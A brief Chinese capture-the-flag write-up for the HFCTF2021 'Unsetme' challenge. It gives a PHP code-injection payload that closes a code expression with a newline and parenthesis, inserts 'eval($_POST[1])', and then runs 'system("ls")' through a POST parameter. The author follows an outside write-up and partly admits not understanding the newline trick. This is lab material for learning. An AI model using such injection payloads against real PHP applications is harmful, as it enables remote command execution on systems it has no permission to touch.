[HFCTF2021Quals]Unsetme

进去是这样的:

image-20241105155247891

感觉应该是要给源码的,但是没给,那就只能wp大法了,

image-20241105155340638

可以看见这个$val就是我们传的a参数,这个有点类似于SQL注入的感觉,也有点像ping的感觉(中间可以加东西,两端得闭合一下)

左边是(我可以是用a%0a)(%0a是截止符,没它中间的东西不会执行(不太理解),右边是);我可以直接phpinfo(执行闭合)

基本上就是

1
2
?a=1%0a);eval($_POST[1]);phpinfo(
POST:1=system("ls");

image-20241105155948660

参考链接:https://blog.csdn.net/Little_jcak/article/details/123516439